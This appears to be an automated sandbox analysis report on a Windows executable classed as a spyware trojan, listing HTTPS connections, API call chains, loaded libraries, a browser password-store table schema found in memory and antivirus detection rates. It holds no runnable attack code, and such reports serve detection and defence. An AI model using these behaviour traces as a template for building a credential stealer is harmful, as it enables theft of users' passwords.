Source: unknown	Network traffic detected: HTTP traffic on port 49963 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49992 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49957
Source: unknown	Network traffic detected: HTTP traffic on port 50062 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50006
Source: unknown	Network traffic detected: HTTP traffic on port 50012 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50008
Source: unknown	Network traffic detected: HTTP traffic on port 49994 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50020 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50054 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50000
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50002
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50004
Source: unknown	Network traffic detected: HTTP traffic on port 50048 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49983 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50006 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50018
Source: unknown	Network traffic detected: HTTP traffic on port 50032 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50010
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50012
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50014
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50016
Source: unknown	Network traffic detected: HTTP traffic on port 50026 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50052 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49980 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50028
Source: unknown	Network traffic detected: HTTP traffic on port 50064 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50008 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50014 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50020
Source: unknown	Network traffic detected: HTTP traffic on port 50070 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50022
Source: unknown	Network traffic detected: HTTP traffic on port 49988 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50024
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50026
Source: unknown	Network traffic detected: HTTP traffic on port 50000 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49957 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50046 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50030
Source: unknown	Network traffic detected: HTTP traffic on port 50038 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50032
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50034
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50036
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50038
Source: unknown	Network traffic detected: HTTP traffic on port 50050 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50024 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50040
Source: unknown	Network traffic detected: HTTP traffic on port 50066 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49998
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49996
Source: unknown	Network traffic detected: HTTP traffic on port 49998 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49994
Source: unknown	Network traffic detected: HTTP traffic on port 50016 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49992
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49990
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50042
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50044
Source: unknown	Network traffic detected: HTTP traffic on port 50058 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50046
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50048
Source: unknown	Network traffic detected: HTTP traffic on port 50002 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50072 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50050
Source: unknown	Network traffic detected: HTTP traffic on port 50030 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50052
Source: unknown	Network traffic detected: HTTP traffic on port 50044 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49988

Source: unknown	HTTPS traffic detected: 172.217.16.206:443 -> 192.168.2.3:49957 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.217.16.129:443 -> 192.168.2.3:49963 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.3:49981 version: TLS 1.2

Source: C:\Users\user\Desktop\6ZoBPR3isG.exe

Code function: 0_2_0040558F GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,LdrInitializeThunk,SendMessageW,CreatePopupMenu,LdrInitializeThunk,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,

0_2_0040558F

Source: C:\Users\user\Desktop\6ZoBPR3isG.exe	Code function: 0_2_004034A5 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,LdrInitializeThunk,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,		0_2_004034A5
Source: C:\Users\user\Desktop\6ZoBPR3isG.exe	Code function: 3_2_004034A5 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,LdrInitializeThunk,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,		3_2_004034A5

Source: C:\Users\user\Desktop\6ZoBPR3isG.exe	Code function: 0_2_00404DCC	0_2_00404DCC
Source: C:\Users\user\Desktop\6ZoBPR3isG.exe	Code function: 0_2_00406AF2	0_2_00406AF2
Source: C:\Users\user\Desktop\6ZoBPR3isG.exe	Code function: 0_2_73F91B5F	0_2_73F91B5F
Source: C:\Users\user\Desktop\6ZoBPR3isG.exe	Code function: 3_2_00404DCC	3_2_00404DCC
Source: C:\Users\user\Desktop\6ZoBPR3isG.exe	Code function: 3_2_00406AF2	3_2_00406AF2
Source: C:\Users\user\Desktop\6ZoBPR3isG.exe	Code function: 3_2_00166270	3_2_00166270
Source: C:\Users\user\Desktop\6ZoBPR3isG.exe	Code function: 3_2_00165550	3_2_00165550
Source: C:\Users\user\Desktop\6ZoBPR3isG.exe	Code function: 3_2_00165540	3_2_00165540
Source: C:\Users\user\Desktop\6ZoBPR3isG.exe	Code function: 3_2_00162DD1	3_2_00162DD1
Source: C:\Users\user\Desktop\6ZoBPR3isG.exe	Code function: 3_2_0016DEC0	3_2_0016DEC0
Source: C:\Users\user\Desktop\6ZoBPR3isG.exe	Code function: 3_2_36AE36C8	3_2_36AE36C8
Source: C:\Users\user\Desktop\6ZoBPR3isG.exe	Code function: 3_2_36AE30B0	3_2_36AE30B0
Source: C:\Users\user\Desktop\6ZoBPR3isG.exe	Code function: 3_2_36AED8C8	3_2_36AED8C8
Source: C:\Users\user\Desktop\6ZoBPR3isG.exe	Code function: 3_2_36AE0040	3_2_36AE0040
Source: C:\Users\user\Desktop\6ZoBPR3isG.exe	Code function: 3_2_36AE9099	3_2_36AE9099
Source: C:\Users\user\Desktop\6ZoBPR3isG.exe	Code function: 3_2_36AED8B7	3_2_36AED8B7
Source: C:\Users\user\Desktop\6ZoBPR3isG.exe	Code function: 3_2_36B99AA8	3_2_36B99AA8
Source: C:\Users\user\Desktop\6ZoBPR3isG.exe	Code function: 3_2_36B90788	3_2_36B90788
Source: C:\Users\user\Desktop\6ZoBPR3isG.exe	Code function: 3_2_36B94CA8	3_2_36B94CA8
Source: C:\Users\user\Desktop\6ZoBPR3isG.exe	Code function: 3_2_36B9E120	3_2_36B9E120
Source: C:\Users\user\Desktop\6ZoBPR3isG.exe	Code function: 3_2_36B9A100	3_2_36B9A100
Source: C:\Users\user\Desktop\6ZoBPR3isG.exe	Code function: 3_2_36B99A98	3_2_36B99A98
Source: C:\Users\user\Desktop\6ZoBPR3isG.exe	Code function: 3_2_36B94A88	3_2_36B94A88
Source: C:\Users\user\Desktop\6ZoBPR3isG.exe	Code function: 3_2_36B9F280	3_2_36B9F280
Source: C:\Users\user\Desktop\6ZoBPR3isG.exe	Code function: 3_2_36B9AEF8	3_2_36B9AEF8
Source: C:\Users\user\Desktop\6ZoBPR3isG.exe	Code function: 3_2_36B942F1	3_2_36B942F1
Source: C:\Users\user\Desktop\6ZoBPR3isG.exe	Code function: 3_2_36B9AEE9	3_2_36B9AEE9
Source: C:\Users\user\Desktop\6ZoBPR3isG.exe	Code function: 3_2_36B9F6D8	3_2_36B9F6D8
Source: C:\Users\user\Desktop\6ZoBPR3isG.exe	Code function: 3_2_36B93ED1	3_2_36B93ED1
Source: C:\Users\user\Desktop\6ZoBPR3isG.exe	Code function: 3_2_36B9F6C8	3_2_36B9F6C8
Source: C:\Users\user\Desktop\6ZoBPR3isG.exe	Code function: 3_2_36B9EE28	3_2_36B9EE28
Source: C:\Users\user\Desktop\6ZoBPR3isG.exe	Code function: 3_2_36B9EE18	3_2_36B9EE18
Source: C:\Users\user\Desktop\6ZoBPR3isG.exe	Code function: 3_2_36B9F270	3_2_36B9F270
Source: C:\Users\user\Desktop\6ZoBPR3isG.exe	Code function: 3_2_36B99650	3_2_36B99650
Source: C:\Users\user\Desktop\6ZoBPR3isG.exe	Code function: 3_2_36B99640	3_2_36B99640
Source: C:\Users\user\Desktop\6ZoBPR3isG.exe	Code function: 3_2_36B9B7A8	3_2_36B9B7A8
Source: C:\Users\user\Desktop\6ZoBPR3isG.exe	Code function: 3_2_36B9B799	3_2_36B9B799
Source: C:\Users\user\Desktop\6ZoBPR3isG.exe	Code function: 3_2_36B9D781	3_2_36B9D781
Source: C:\Users\user\Desktop\6ZoBPR3isG.exe	Code function: 3_2_36B9BBF0	3_2_36B9BBF0
Source: C:\Users\user\Desktop\6ZoBPR3isG.exe	Code function: 3_2_36B9FB30	3_2_36B9FB30
Source: C:\Users\user\Desktop\6ZoBPR3isG.exe	Code function: 3_2_36B9FB20	3_2_36B9FB20
Source: C:\Users\user\Desktop\6ZoBPR3isG.exe	Code function: 3_2_36B94300	3_2_36B94300
Source: C:\Users\user\Desktop\6ZoBPR3isG.exe	Code function: 3_2_36B9077B	3_2_36B9077B
Source: C:\Users\user\Desktop\6ZoBPR3isG.exe	Code function: 3_2_36B9B350	3_2_36B9B350
Source: C:\Users\user\Desktop\6ZoBPR3isG.exe	Code function: 3_2_36B9B341	3_2_36B9B341
Source: C:\Users\user\Desktop\6ZoBPR3isG.exe	Code function: 3_2_36B9DCB8	3_2_36B9DCB8
Source: C:\Users\user\Desktop\6ZoBPR3isG.exe	Code function: 3_2_36B9C4B0	3_2_36B9C4B0
Source: C:\Users\user\Desktop\6ZoBPR3isG.exe	Code function: 3_2_36B9C4A3	3_2_36B9C4A3
Source: C:\Users\user\Desktop\6ZoBPR3isG.exe	Code function: 3_2_36B9A081	3_2_36B9A081
Source: C:\Users\user\Desktop\6ZoBPR3isG.exe	Code function: 3_2_36B984F0	3_2_36B984F0
Source: C:\Users\user\Desktop\6ZoBPR3isG.exe	Code function: 3_2_36B984DF	3_2_36B984DF
Source: C:\Users\user\Desktop\6ZoBPR3isG.exe	Code function: 3_2_36B9DCC8	3_2_36B9DCC8
Source: C:\Users\user\Desktop\6ZoBPR3isG.exe	Code function: 3_2_36B9BC00	3_2_36B9BC00
Source: C:\Users\user\Desktop\6ZoBPR3isG.exe	Code function: 3_2_36B9D870	3_2_36B9D870
Source: C:\Users\user\Desktop\6ZoBPR3isG.exe	Code function: 3_2_36B9C058	3_2_36B9C058
Source: C:\Users\user\Desktop\6ZoBPR3isG.exe	Code function: 3_2_36B9C053	3_2_36B9C053
Source: C:\Users\user\Desktop\6ZoBPR3isG.exe	Code function: 3_2_36B98DA0	3_2_36B98DA0
Source: C:\Users\user\Desktop\6ZoBPR3isG.exe	Code function: 3_2_36B98D90	3_2_36B98D90
Source: C:\Users\user\Desktop\6ZoBPR3isG.exe	Code function: 3_2_36B991F8	3_2_36B991F8
Source: C:\Users\user\Desktop\6ZoBPR3isG.exe	Code function: 3_2_36B991E8	3_2_36B991E8
Source: C:\Users\user\Desktop\6ZoBPR3isG.exe	Code function: 3_2_36B9E9D0	3_2_36B9E9D0
Source: C:\Users\user\Desktop\6ZoBPR3isG.exe	Code function: 3_2_36B98938	3_2_36B98938
Source: C:\Users\user\Desktop\6ZoBPR3isG.exe	Code function: 3_2_36B9E11B	3_2_36B9E11B
Source: C:\Users\user\Desktop\6ZoBPR3isG.exe	Code function: 3_2_36B9C908	3_2_36B9C908
Source: C:\Users\user\Desktop\6ZoBPR3isG.exe	Code function: 3_2_36B9E578	3_2_36B9E578
Source: C:\Users\user\Desktop\6ZoBPR3isG.exe	Code function: 3_2_36B9E568	3_2_36B9E568
Source: C:\Users\user\Desktop\6ZoBPR3isG.exe	Code function: 3_2_36B98948	3_2_36B98948
Source: C:\Users\user\Desktop\6ZoBPR3isG.exe	Code function: 3_2_371F8770	3_2_371F8770
Source: C:\Users\user\Desktop\6ZoBPR3isG.exe	Code function: 3_2_371F4FD0	3_2_371F4FD0
Source: C:\Users\user\Desktop\6ZoBPR3isG.exe	Code function: 3_2_371F6690	3_2_371F6690
Source: C:\Users\user\Desktop\6ZoBPR3isG.exe	Code function: 3_2_371F8408	3_2_371F8408
Source: C:\Users\user\Desktop\6ZoBPR3isG.exe	Code function: 3_2_371F6CE0	3_2_371F6CE0
Source: C:\Users\user\Desktop\6ZoBPR3isG.exe	Code function: 3_2_371F7330	3_2_371F7330
Source: C:\Users\user\Desktop\6ZoBPR3isG.exe	Code function: 3_2_371F6048	3_2_371F6048
Source: C:\Users\user\Desktop\6ZoBPR3isG.exe	Code function: 3_2_371FB8AC	3_2_371FB8AC
Source: C:\Users\user\Desktop\6ZoBPR3isG.exe	Code function: 3_2_371F1730	3_2_371F1730
Source: C:\Users\user\Desktop\6ZoBPR3isG.exe	Code function: 3_2_371F1720	3_2_371F1720
Source: C:\Users\user\Desktop\6ZoBPR3isG.exe	Code function: 3_2_371F1FD0	3_2_371F1FD0
Source: C:\Users\user\Desktop\6ZoBPR3isG.exe	Code function: 3_2_371F4FC0	3_2_371F4FC0
Source: C:\Users\user\Desktop\6ZoBPR3isG.exe	Code function: 3_2_371FB7E8	3_2_371FB7E8
Source: C:\Users\user\Desktop\6ZoBPR3isG.exe	Code function: 3_2_371F1FE0	3_2_371F1FE0
Source: C:\Users\user\Desktop\6ZoBPR3isG.exe	Code function: 3_2_371F3E38	3_2_371F3E38
Source: C:\Users\user\Desktop\6ZoBPR3isG.exe	Code function: 3_2_371F3E48	3_2_371F3E48
Source: C:\Users\user\Desktop\6ZoBPR3isG.exe	Code function: 3_2_371F6680	3_2_371F6680
Source: C:\Users\user\Desktop\6ZoBPR3isG.exe	Code function: 3_2_371F0D39	3_2_371F0D39
Source: C:\Users\user\Desktop\6ZoBPR3isG.exe	Code function: 3_2_371F0D48	3_2_371F0D48
Source: C:\Users\user\Desktop\6ZoBPR3isG.exe	Code function: 3_2_371F3598	3_2_371F3598
Source: C:\Users\user\Desktop\6ZoBPR3isG.exe	Code function: 3_2_371F3589	3_2_371F3589
Source: C:\Users\user\Desktop\6ZoBPR3isG.exe	Code function: 3_2_371F2438	3_2_371F2438
Source: C:\Users\user\Desktop\6ZoBPR3isG.exe	Code function: 3_2_371F2428	3_2_371F2428
Source: C:\Users\user\Desktop\6ZoBPR3isG.exe	Code function: 3_2_371F0498	3_2_371F0498
Source: C:\Users\user\Desktop\6ZoBPR3isG.exe	Code function: 3_2_371F0488	3_2_371F0488
Source: C:\Users\user\Desktop\6ZoBPR3isG.exe	Code function: 3_2_371F2CD8	3_2_371F2CD8
Source: C:\Users\user\Desktop\6ZoBPR3isG.exe	Code function: 3_2_371F6CD2	3_2_371F6CD2
Source: C:\Users\user\Desktop\6ZoBPR3isG.exe	Code function: 3_2_371F44CF	3_2_371F44CF
Source: C:\Users\user\Desktop\6ZoBPR3isG.exe	Code function: 3_2_371F2CE8	3_2_371F2CE8
Source: C:\Users\user\Desktop\6ZoBPR3isG.exe	Code function: 3_2_371F7320	3_2_371F7320
Source: C:\Users\user\Desktop\6ZoBPR3isG.exe	Code function: 3_2_371F1B78	3_2_371F1B78
Source: C:\Users\user\Desktop\6ZoBPR3isG.exe	Code function: 3_2_371F1B88	3_2_371F1B88
Source: C:\Users\user\Desktop\6ZoBPR3isG.exe	Code function: 3_2_371FBAB8	3_2_371FBAB8
Source: C:\Users\user\Desktop\6ZoBPR3isG.exe	Code function: 3_2_371FBAA8	3_2_371FBAA8
Source: C:\Users\user\Desktop\6ZoBPR3isG.exe	Code function: 3_2_371F3130	3_2_371F3130
Source: C:\Users\user\Desktop\6ZoBPR3isG.exe	Code function: 3_2_371F3140	3_2_371F3140
Source: C:\Users\user\Desktop\6ZoBPR3isG.exe	Code function: 3_2_371F7978	3_2_371F7978
Source: C:\Users\user\Desktop\6ZoBPR3isG.exe	Code function: 3_2_371F7968	3_2_371F7968
Source: C:\Users\user\Desktop\6ZoBPR3isG.exe	Code function: 3_2_371F1190	3_2_371F1190
Source: C:\Users\user\Desktop\6ZoBPR3isG.exe	Code function: 3_2_371F11A0	3_2_371F11A0
Source: C:\Users\user\Desktop\6ZoBPR3isG.exe	Code function: 3_2_371F39F0	3_2_371F39F0
Source: C:\Users\user\Desktop\6ZoBPR3isG.exe	Code function: 3_2_371F39E1	3_2_371F39E1
Source: C:\Users\user\Desktop\6ZoBPR3isG.exe	Code function: 3_2_371F6038	3_2_371F6038
Source: C:\Users\user\Desktop\6ZoBPR3isG.exe	Code function: 3_2_371F0040	3_2_371F0040
Source: C:\Users\user\Desktop\6ZoBPR3isG.exe	Code function: 3_2_371FD870	3_2_371FD870
Source: C:\Users\user\Desktop\6ZoBPR3isG.exe	Code function: 3_2_371F2890	3_2_371F2890
Source: C:\Users\user\Desktop\6ZoBPR3isG.exe	Code function: 3_2_371F2881	3_2_371F2881
Source: C:\Users\user\Desktop\6ZoBPR3isG.exe	Code function: 3_2_371FB8A0	3_2_371FB8A0
Source: C:\Users\user\Desktop\6ZoBPR3isG.exe	Code function: 3_2_371F08F0	3_2_371F08F0
Source: C:\Users\user\Desktop\6ZoBPR3isG.exe	Code function: 3_2_371F08E0	3_2_371F08E0
Source: C:\Users\user\Desktop\6ZoBPR3isG.exe	Code function: 3_2_3775C068	3_2_3775C068
Source: C:\Users\user\Desktop\6ZoBPR3isG.exe	Code function: 3_2_3775AEA8	3_2_3775AEA8
Source: C:\Users\user\Desktop\6ZoBPR3isG.exe	Code function: 3_2_37754DC8	3_2_37754DC8

Source: C:\Users\user\Desktop\6ZoBPR3isG.exe

Code function: String function: 00402C41 appears 51 times

Source: 6ZoBPR3isG.exe, 00000000.00000000.1353099128.0000000000455000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenamesupraocular tailorizes.exeDVarFileInfo$ vs 6ZoBPR3isG.exe
Source: 6ZoBPR3isG.exe, 00000003.00000002.2616557966.0000000000455000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenamesupraocular tailorizes.exeDVarFileInfo$ vs 6ZoBPR3isG.exe
Source: 6ZoBPR3isG.exe, 00000003.00000002.2643001958.0000000033F67000.00000004.00000010.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameUNKNOWN_FILET vs 6ZoBPR3isG.exe
Source: 6ZoBPR3isG.exe	Binary or memory string: OriginalFilenamesupraocular tailorizes.exeDVarFileInfo$ vs 6ZoBPR3isG.exe

Source: 6ZoBPR3isG.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@3/8@5/5

Source: C:\Users\user\Desktop\6ZoBPR3isG.exe	Code function: 0_2_004034A5 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,LdrInitializeThunk,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,		0_2_004034A5
Source: C:\Users\user\Desktop\6ZoBPR3isG.exe	Code function: 3_2_004034A5 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,LdrInitializeThunk,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,		3_2_004034A5

Source: C:\Users\user\Desktop\6ZoBPR3isG.exe

Code function: 0_2_00404850 GetDlgItem,SetWindowTextW,LdrInitializeThunk,LdrInitializeThunk,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,LdrInitializeThunk,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,

0_2_00404850

Source: C:\Users\user\Desktop\6ZoBPR3isG.exe

Code function: 0_2_00402104 LdrInitializeThunk,CoCreateInstance,LdrInitializeThunk,

0_2_00402104

Source: C:\Users\user\Desktop\6ZoBPR3isG.exe

File created: C:\Users\user\AppData\Local\Iw

Jump to behavior

Source: C:\Users\user\Desktop\6ZoBPR3isG.exe

Mutant created: NULL

Source: C:\Users\user\Desktop\6ZoBPR3isG.exe

File created: C:\Users\user\AppData\Local\Temp\nsd98ED.tmp

Jump to behavior

Source: 6ZoBPR3isG.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\6ZoBPR3isG.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\6ZoBPR3isG.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: 6ZoBPR3isG.exe, 00000003.00000002.2645459156.000000003515D000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: 6ZoBPR3isG.exe	Virustotal: Detection: 41%
Source: 6ZoBPR3isG.exe	ReversingLabs: Detection: 60%

Source: C:\Users\user\Desktop\6ZoBPR3isG.exe

File read: C:\Users\user\Desktop\6ZoBPR3isG.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\6ZoBPR3isG.exe "C:\Users\user\Desktop\6ZoBPR3isG.exe"
Source: C:\Users\user\Desktop\6ZoBPR3isG.exe	Process created: C:\Users\user\Desktop\6ZoBPR3isG.exe "C:\Users\user\Desktop\6ZoBPR3isG.exe"
Source: C:\Users\user\Desktop\6ZoBPR3isG.exe	Process created: C:\Users\user\Desktop\6ZoBPR3isG.exe "C:\Users\user\Desktop\6ZoBPR3isG.exe"	Jump to behavior

Source: C:\Users\user\Desktop\6ZoBPR3isG.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\6ZoBPR3isG.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\6ZoBPR3isG.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\6ZoBPR3isG.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\6ZoBPR3isG.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\6ZoBPR3isG.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\6ZoBPR3isG.exe	Section loaded: oleacc.dll	Jump to behavior
Source: C:\Users\user\Desktop\6ZoBPR3isG.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\6ZoBPR3isG.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\6ZoBPR3isG.exe	Section loaded: shfolder.dll	Jump to behavior
Source: C:\Users\user\Desktop\6ZoBPR3isG.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\6ZoBPR3isG.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\6ZoBPR3isG.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\6ZoBPR3isG.exe	Section loaded: riched20.dll	Jump to behavior
Source: C:\Users\user\Desktop\6ZoBPR3isG.exe	Section loaded: usp10.dll	Jump to behavior
Source: C:\Users\user\Desktop\6ZoBPR3isG.exe	Section loaded: msls31.dll	Jump to behavior
Source: C:\Users\user\Desktop\6ZoBPR3isG.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\Desktop\6ZoBPR3isG.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\Desktop\6ZoBPR3isG.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\6ZoBPR3isG.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\6ZoBPR3isG.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\6ZoBPR3isG.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\6ZoBPR3isG.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\6ZoBPR3isG.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\6ZoBPR3isG.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\6ZoBPR3isG.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\6ZoBPR3isG.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\6ZoBPR3isG.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\6ZoBPR3isG.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\6ZoBPR3isG.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\6ZoBPR3isG.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\6ZoBPR3isG.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\6ZoBPR3isG.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\6ZoBPR3isG.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\6ZoBPR3isG.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\6ZoBPR3isG.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\6ZoBPR3isG.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\6ZoBPR3isG.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\6ZoBPR3isG.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\6ZoBPR3isG.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\6ZoBPR3isG.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\6ZoBPR3isG.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\6ZoBPR3isG.exe	Section loaded: mskeyprotect.dll	Jump to behavior
